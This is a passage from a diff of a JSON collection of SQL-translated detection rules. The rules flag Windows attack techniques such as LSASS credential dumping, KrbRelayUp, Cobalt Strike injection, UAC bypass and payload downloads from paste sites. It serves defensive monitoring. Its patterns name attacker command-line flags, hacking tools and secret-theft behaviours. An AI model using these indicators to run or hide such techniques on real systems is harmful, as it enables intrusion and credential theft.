Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE 